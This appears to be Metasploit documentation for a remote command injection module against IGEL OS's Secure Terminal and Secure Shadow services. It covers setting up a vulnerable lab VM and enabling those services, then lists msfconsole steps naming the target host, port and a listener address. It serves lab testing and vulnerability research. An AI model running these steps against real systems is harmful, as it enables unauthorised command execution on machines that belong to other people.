IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure Shadow services.
This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability. After exploitation these changes are reverted.
Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.
Unpack downloaded zip file and create a VM using the included .iso.
Navigate through the installation menus to install the firmware, reboot when prompted
After rebooted work through the presented configuration wizard. In the Activation section use the starter license (selected by default). Skip the ICG Agent Setup. Upon completion the system will reboot again.
### Turn on vulnerable services
1. Click on the launcher menu
2. Click on the gear icon
3. Select "Setup" from the Application menu to launch the Setup app
4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow. Ensure "Allow remote shadowing" and "Secure mode" are checked.
5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.
### Exploitation
1. start msfconsole
2.`use exploit/linux/misc/igel_command_injection`
3.`set RHOST [TARGET IP]`
4.`set RPORT [30022 or 5900]`
5.`set LHOST [LOCAL IP]`
6.`exploit`
### Misc
To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details". A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.
